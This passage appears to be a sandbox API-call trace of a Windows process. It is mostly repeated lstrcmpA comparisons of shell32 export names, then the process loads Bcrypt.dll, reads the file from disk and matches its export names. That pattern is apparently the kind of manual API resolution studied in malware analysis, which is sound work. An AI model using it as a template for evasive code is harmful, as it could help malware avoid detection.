lpString2="Control_RunDLL") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0125.001] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.001] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.002] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0125.002] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0125.002] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0125.002] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0125.002] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0125.003] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.004] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0125.005] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0125.006] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0125.006] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0125.006] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0125.006] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0125.006] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0125.006] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0125.006] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0125.006] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0125.006] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0125.007] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0125.008] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0125.008] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0125.008] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0125.008] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.008] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0125.008] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.008] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0125.008] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0125.009] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0125.009] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0125.009] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0125.010] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0125.011] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0125.582] GetProcessHeap () returned 0x590000 [0125.582] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40c3040 | out: hHeap=0x590000) returned 1 [0126.358] GetProcessHeap () returned 0x590000 [0126.358] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a92e0 [0126.359] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0126.367] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0126.367] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0126.367] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0126.368] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0126.368] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0126.368] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0126.368] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0126.368] GetProcessHeap () returned 0x590000 [0126.368] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x26fa0) returned 0x2d02010 [0126.368] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0126.368] ReadFile (in: hFile=0x15c, lpBuffer=0x2d02010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d02010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0126.374] CloseHandle (hObject=0x15c) returned 1 [0126.376] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0126.376] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0126.376] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0126.376] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0126.376] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.376] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0126.376] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0126.376] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.376] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.376] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0126.376] lstrcmpA 